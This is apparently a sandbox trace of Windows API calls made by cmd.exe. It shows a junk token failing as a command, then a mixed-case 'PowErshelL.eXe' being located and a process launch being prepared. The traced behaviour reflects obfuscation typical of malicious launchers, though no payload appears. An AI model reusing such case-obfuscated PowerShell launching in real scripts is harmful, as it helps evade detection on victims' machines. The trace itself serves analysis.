	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="START") returned 4
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DPATH") returned 19
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="KEYS") returned 12
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MOVE") returned 10
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PUSHD") returned 7
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="POPD") returned 7
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ASSOC") returned 22
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FTYPE") returned 17
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="BREAK") returned 21
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COLOR") returned 20
	[0055.156] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKLINK") returned 10
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DIR") returned 19
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ERASE") returned 18
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DEL") returned 19
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TYPE") returned 3
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COPY") returned 20
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CD") returned 20
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CHDIR") returned 20
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RENAME") returned 5
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REN") returned 5
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ECHO") returned 18
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SET") returned 4
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PAUSE") returned 7
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DATE") returned 19
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TIME") returned 3
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PROMPT") returned 7
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MD") returned 10
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKDIR") returned 10
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RD") returned 5
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RMDIR") returned 5
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PATH") returned 7
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="GOTO") returned 16
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SHIFT") returned 4
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CLS") returned 20
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CALL") returned 20
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VERIFY") returned 1
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VER") returned 1
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VOL") returned 1
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="EXIT") returned 18
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SETLOCAL") returned 4
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ENDLOCAL") returned 18
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TITLE") returned 3
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="START") returned 4
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DPATH") returned 19
	[0055.157] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="KEYS") returned 12
	[0055.158] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MOVE") returned 10
	[0055.158] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PUSHD") returned 7
	[0055.158] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="POPD") returned 7
	[0055.158] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ASSOC") returned 22
	[0055.158] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FTYPE") returned 17
	[0055.158] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="BREAK") returned 21
	[0055.158] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COLOR") returned 20
	[0055.158] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKLINK") returned 10
	[0055.158] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FOR") returned 17
	[0055.158] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="IF") returned 14
	[0055.158] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REM") returned 5
	[0055.158] GetProcessHeap () returned 0x220000
	[0055.158] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x218) returned 0x221800
	[0055.158] GetProcessHeap () returned 0x220000
	[0055.158] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x34) returned 0x236a60
	[0055.159] _wcsnicmp (_String1="WNjK", _String2="cmd ", _MaxCount=0x4) returned 20
	[0055.159] GetProcessHeap () returned 0x220000
	[0055.159] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x420) returned 0x23afd0
	[0055.159] SetErrorMode (uMode=0x0) returned 0x0
	[0055.159] SetErrorMode (uMode=0x1) returned 0x0
	[0055.159] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x23afe0, lpFilePart=0x14edd0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x14edd0*="Documents") returned 0x1b
	[0055.159] SetErrorMode (uMode=0x0) returned 0x1
	[0055.159] GetProcessHeap () returned 0x220000
	[0055.159] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x23afd0, Size=0x68) returned 0x23afd0
	[0055.159] GetProcessHeap () returned 0x220000
	[0055.159] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x23afd0) returned 0x68
	[0055.159] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0055.159] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0055.160] GetProcessHeap () returned 0x220000
	[0055.160] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x170) returned 0x221a20
	[0055.160] GetProcessHeap () returned 0x220000
	[0055.160] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x2d0) returned 0x23b050
	[0055.164] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x23b050, Size=0x172) returned 0x23b050
	[0055.164] GetProcessHeap () returned 0x220000
	[0055.164] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x23b050) returned 0x172
	[0055.164] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0055.165] GetProcessHeap () returned 0x220000
	[0055.165] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xe8) returned 0x221ba0
	[0055.165] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x221ba0, Size=0x7e) returned 0x221ba0
	[0055.165] GetProcessHeap () returned 0x220000
	[0055.165] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x221ba0) returned 0x7e
	[0055.166] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.166] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.166] GetLastError () returned 0x2
	[0055.167] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.167] GetLastError () returned 0x2
	[0055.167] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.167] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.167] GetLastError () returned 0x2
	[0055.168] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.168] GetLastError () returned 0x2
	[0055.168] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.168] FindFirstFileExW (in: lpFileName="C:\\Windows\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.169] GetLastError () returned 0x2
	[0055.169] FindFirstFileExW (in: lpFileName="C:\\Windows\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.169] GetLastError () returned 0x2
	[0055.169] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.170] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.170] GetLastError () returned 0x2
	[0055.170] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.170] GetLastError () returned 0x2
	[0055.170] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.171] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.171] GetLastError () returned 0x2
	[0055.171] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.171] GetLastError () returned 0x2
	[0055.171] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.172] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.173] GetLastError () returned 0x2
	[0055.173] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x14eb40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eb40) returned 0xffffffffffffffff
	[0055.174] GetLastError () returned 0x2
	[0055.174] _get_osfhandle (_FileHandle=2) returned 0xb
	[0055.174] GetFileType (hFile=0xb) returned 0x2
	[0055.175] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0055.175] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1
	[0055.175] _get_osfhandle (_FileHandle=2) returned 0xb
	[0055.175] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x14efd0 | out: lpConsoleScreenBufferInfo=0x14efd0) returned 1
	[0055.175] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0055.176] GetConsoleTitleW (in: lpConsoleTitle=0x14f480, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0055.177] GetFileAttributesW (lpFileName="PowErshelL.eXe" (normalized: "c:\\users\\aetadzjz\\documents\\powershell.exe")) returned 0xffffffff
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0055.177] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0055.178] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0055.179] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0055.258] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0055.258] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0055.258] _wcsicmp (_String1="PowErshelL", _String2="FOR") returned 10
	[0055.258] _wcsicmp (_String1="PowErshelL", _String2="IF") returned 7
	[0055.258] _wcsicmp (_String1="PowErshelL", _String2="REM") returned -2
	[0055.259] SetErrorMode (uMode=0x0) returned 0x0
	[0055.259] SetErrorMode (uMode=0x1) returned 0x0
	[0055.259] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x23b640, lpFilePart=0x14ed10 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x14ed10*="Documents") returned 0x1b
	[0055.259] SetErrorMode (uMode=0x0) returned 0x1
	[0055.259] GetProcessHeap () returned 0x220000
	[0055.259] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x23b630, Size=0x66) returned 0x23b630
	[0055.259] GetProcessHeap () returned 0x220000
	[0055.259] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x23b630) returned 0x66
	[0055.259] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0055.259] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0055.259] GetProcessHeap () returned 0x220000
	[0055.259] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x170) returned 0x221c30
	[0055.259] GetProcessHeap () returned 0x220000
	[0055.259] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x2d0) returned 0x23b6b0
	[0055.260] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x23b6b0, Size=0x172) returned 0x23b6b0
	[0055.260] GetProcessHeap () returned 0x220000
	[0055.260] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x23b6b0) returned 0x172
	[0055.260] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0055.260] GetProcessHeap () returned 0x220000
	[0055.260] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xe8) returned 0x23b840
	[0055.260] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x23b840, Size=0x7e) returned 0x23b840
	[0055.260] GetProcessHeap () returned 0x220000
	[0055.260] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x23b840) returned 0x7e
	[0055.260] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.261] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.261] GetLastError () returned 0x2
	[0055.261] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.261] GetLastError () returned 0x2
	[0055.262] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.262] GetLastError () returned 0x2
	[0055.262] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.262] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.262] GetLastError () returned 0x2
	[0055.263] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.263] GetLastError () returned 0x2
	[0055.263] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.263] GetLastError () returned 0x2
	[0055.264] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.264] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.264] GetLastError () returned 0x2
	[0055.264] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.264] GetLastError () returned 0x2
	[0055.265] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.265] GetLastError () returned 0x2
	[0055.265] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.265] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.266] GetLastError () returned 0x2
	[0055.266] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.266] GetLastError () returned 0x2
	[0055.266] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0xffffffffffffffff
	[0055.266] GetLastError () returned 0x2
	[0055.267] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.267] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x14ea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ea80) returned 0x23a480
	[0055.267] GetProcessHeap () returned 0x220000
	[0055.267] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x28) returned 0x2349a0
	[0055.267] FindClose (in: hFindFile=0x23a480 | out: hFindFile=0x23a480) returned 1
	[0055.267] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
	[0055.267] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
	[0055.267] GetConsoleTitleW (in: lpConsoleTitle=0x14efd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0055.267] InitializeProcThreadAttributeList (in: lpAttributeList=0x14ed88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14ed48 | out: lpAttributeList=0x14ed88, lpSize=0x14ed48) returned 1
	[0055.267] UpdateProcThreadAttribute (in: lpAttributeList=0x14ed88, dwFlags=0x0, Attribute=0x60001, lpValue=0x14ed38, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14ed88, lpPreviousValue=0x0) returned 1
